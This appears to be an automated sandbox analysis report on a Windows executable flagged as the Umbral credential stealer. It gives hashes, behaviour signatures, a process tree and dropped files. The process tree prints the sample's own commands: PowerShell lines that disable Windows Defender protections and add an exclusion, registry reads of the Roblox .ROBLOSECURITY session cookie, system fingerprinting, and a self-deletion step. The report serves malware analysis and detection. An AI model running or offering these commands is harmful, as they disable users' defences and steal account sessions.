Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 23:44

General

  • Target

    18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe

  • Size

    1.4MB

  • MD5

    ce100b5ae4fe05c8fd8f44f7ad9f4b40

  • SHA1

    19a77380a68da11304c9ba7c1048f7257ba4951f

  • SHA256

    18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343b

  • SHA512

    b19f7cd1b558ef7f598adb84726c94c885696c31efdbd981d07df17b908cb23fd7098b6f8f622d584033b55dba1d264f68a734e60bd81cb5d3f5600a542652ca

  • SSDEEP

    24576:6DiGBKBipGMOU5lRBixlkBg0BLchDLtVVi/FpPwgX2YVC0/xaTO3O:OiGBKBipGMOUXRBi4tuFtjCxB80/xP

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe
    "C:\Users\Admin\AppData\Local\Temp\18a0a32340d190a5b8c803fa84bae012a4a6f8c89ef228a74e40c7edd89b343bN.exe"
    1⤵
    • Drops startup file
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      2⤵
      • Drops file in Drivers directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2452
      • C:\Windows\SysWOW64\attrib.exe
        "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:1332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3232
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1932
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1044
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4396
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • System Location Discovery: System Language Discovery
        • Detects videocard installed
        PID:1140
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" && pause
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:756

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    06d1b749d3f35881cd5a3a066c655af2

    SHA1

    65f8a199248cabe8d1077d35f6e7f4c294a9fe15

    SHA256

    85e2daf186c4d1eca8e77072f9f4b0f30fc94f62b63440ce2cf8e6e1d4e8aeb5

    SHA512

    5eb1ecc58a6dfca5234bff29033709f8a689250942e6aed21d359eafc47e19cf14c771e1fa56e27c69755f56618a1616f5b11700727fb005e654b89abc8629db

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    11df42ef53c5c2d3d8cc748044fd48bf

    SHA1

    a25bd05d55aa51693b6fb208e8aee68ba4dd30f8

    SHA256

    de11d7d7759cf6b002dcadf901d875fc09263658c2d14a73ca7d4a9c195efb3b

    SHA512

    56439268a0e29f75be8a7cd5e678052c8896f496454dc1291a2760e78489427c67aa8ad733317c39e017804e03b594417c3960979545a185d4f70d440afa67a0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    6169b683e53d7621f05e7ca0339ada7d

    SHA1

    7981e397405376aac1f59d0474858820eaffffc6

    SHA256

    037370a974f906aead4c5a8a6b5fc5e6ee63ad89b36110ba5a2205cb5fa9ad91

    SHA512

    dcda3b938ef621264486dc90338458cece2dcdf05a879a7c1c46e0af7dfcb4272b5e65ae72ace121f1432522b4bb90065f5acd694660709e1f2dd43681ef53b6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    9cc92f8c5c8ecb1048d7583ec74e235a

    SHA1

    67d21971effb76d3863a69eb97f4cba907cbf0c0

    SHA256

    f0cfd88c0fdbf6e384628ace82a8227b43054df7c1ed22378193e9f848247986

    SHA512

    2d80a8191367e571b7f5aa563eae73b78c39b40c46d537365e1d3cabb6a75249ee2010dee0b0550d96e7efa5a42270794e46e892c8cd15c111441f64d04899ab

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfvc4jsn.3i4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/656-0-0x000000007448E000-0x000000007448F000-memory.dmp

    Filesize

    4KB

  • memory/656-1-0x0000000000460000-0x00000000005C0000-memory.dmp

    Filesize

    1.4MB

  • memory/656-2-0x0000000004FD0000-0x000000000506C000-memory.dmp

    Filesize

    624KB

  • memory/656-3-0x0000000005620000-0x0000000005BC4000-memory.dmp

    Filesize

    5.6MB

  • memory/656-5-0x0000000005DD0000-0x0000000005E86000-memory.dmp

    Filesize

    728KB

  • memory/1584-101-0x00000000058A0000-0x0000000005BF4000-memory.dmp

    Filesize

    3.3MB

  • memory/2572-94-0x0000000006B10000-0x0000000006B32000-memory.dmp

    Filesize

    136KB

  • memory/2572-91-0x00000000061A0000-0x00000000064F4000-memory.dmp

    Filesize

    3.3MB

  • memory/2572-93-0x0000000006C10000-0x0000000006C5C000-memory.dmp

    Filesize

    304KB

  • memory/2876-9-0x0000000074480000-0x0000000074C30000-memory.dmp

    Filesize

    7.7MB

  • memory/2876-109-0x0000000006FC0000-0x0000000006FCA000-memory.dmp

    Filesize

    40KB

  • memory/2876-10-0x0000000074480000-0x0000000074C30000-memory.dmp

    Filesize

    7.7MB

  • memory/2876-125-0x0000000074480000-0x0000000074C30000-memory.dmp

    Filesize

    7.7MB

  • memory/2876-110-0x0000000007CC0000-0x0000000007CD2000-memory.dmp

    Filesize

    72KB

  • memory/2876-132-0x0000000074480000-0x0000000074C30000-memory.dmp

    Filesize

    7.7MB

  • memory/2876-8-0x00000000052C0000-0x0000000005352000-memory.dmp

    Filesize

    584KB

  • memory/2876-128-0x0000000074480000-0x0000000074C30000-memory.dmp

    Filesize

    7.7MB

  • memory/2876-69-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

    Filesize

    120KB

  • memory/2876-68-0x0000000006C70000-0x0000000006CC0000-memory.dmp

    Filesize

    320KB

  • memory/2876-67-0x0000000006AA0000-0x0000000006B16000-memory.dmp

    Filesize

    472KB

  • memory/2876-6-0x0000000000400000-0x0000000000440000-memory.dmp

    Filesize

    256KB

  • memory/3232-13-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

    Filesize

    136KB

  • memory/3232-40-0x0000000006B90000-0x0000000006C33000-memory.dmp

    Filesize

    652KB

  • memory/3232-48-0x0000000007200000-0x000000000721A000-memory.dmp

    Filesize

    104KB

  • memory/3232-49-0x00000000071E0000-0x00000000071E8000-memory.dmp

    Filesize

    32KB

  • memory/3232-46-0x00000000070F0000-0x00000000070FE000-memory.dmp

    Filesize

    56KB

  • memory/3232-11-0x0000000002280000-0x00000000022B6000-memory.dmp

    Filesize

    216KB

  • memory/3232-45-0x00000000070C0000-0x00000000070D1000-memory.dmp

    Filesize

    68KB

  • memory/3232-44-0x0000000007140000-0x00000000071D6000-memory.dmp

    Filesize

    600KB

  • memory/3232-43-0x0000000006F30000-0x0000000006F3A000-memory.dmp

    Filesize

    40KB

  • memory/3232-42-0x0000000006CB0000-0x0000000006CCA000-memory.dmp

    Filesize

    104KB

  • memory/3232-41-0x0000000007580000-0x0000000007BFA000-memory.dmp

    Filesize

    6.5MB

  • memory/3232-47-0x0000000007100000-0x0000000007114000-memory.dmp

    Filesize

    80KB

  • memory/3232-39-0x0000000006160000-0x000000000617E000-memory.dmp

    Filesize

    120KB

  • memory/3232-28-0x0000000006B50000-0x0000000006B82000-memory.dmp

    Filesize

    200KB

  • memory/3232-29-0x000000006FD30000-0x000000006FD7C000-memory.dmp

    Filesize

    304KB

  • memory/3232-27-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

    Filesize

    304KB

  • memory/3232-26-0x0000000005B90000-0x0000000005BAE000-memory.dmp

    Filesize

    120KB

  • memory/3232-25-0x0000000005710000-0x0000000005A64000-memory.dmp

    Filesize

    3.3MB

  • memory/3232-12-0x0000000004E40000-0x0000000005468000-memory.dmp

    Filesize

    6.2MB

  • memory/3232-20-0x00000000055A0000-0x0000000005606000-memory.dmp

    Filesize

    408KB

  • memory/3232-14-0x0000000004DB0000-0x0000000004E16000-memory.dmp

    Filesize

    408KB

  • memory/4396-124-0x0000000006330000-0x000000000637C000-memory.dmp

    Filesize

    304KB

  • memory/4396-122-0x0000000005B20000-0x0000000005E74000-memory.dmp

    Filesize

    3.3MB

  • memory/4500-62-0x00000000053E0000-0x0000000005734000-memory.dmp

    Filesize

    3.3MB